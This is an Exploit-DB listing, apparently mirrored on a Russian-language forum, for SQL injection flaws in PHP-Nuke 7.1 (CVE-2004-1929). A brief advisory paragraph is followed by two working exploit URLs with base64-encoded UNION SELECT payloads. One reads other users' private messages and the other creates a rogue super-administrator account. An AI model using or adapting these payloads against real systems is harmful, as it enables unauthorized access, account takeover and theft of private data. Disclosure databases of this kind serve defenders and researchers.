- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23998
- Проверка EDB
-
- Пройдено
- Автор
- WARAXE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2004-1929
- Дата публикации
- 2004-04-13
Код:
source: https://www.securityfocus.com/bid/10135/info
Reportedly PHP-Nuke is prone to multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input.
As a result of these issues an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information.
To read arbitrary users private messages:
http://www.example.com/nuke71/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox
To create an arbitrary administrator account with username "waraxe2" and password "coolpass":
http://www.example.com/nuke71/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&[email protected]&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
- Источник
- www.exploit-db.com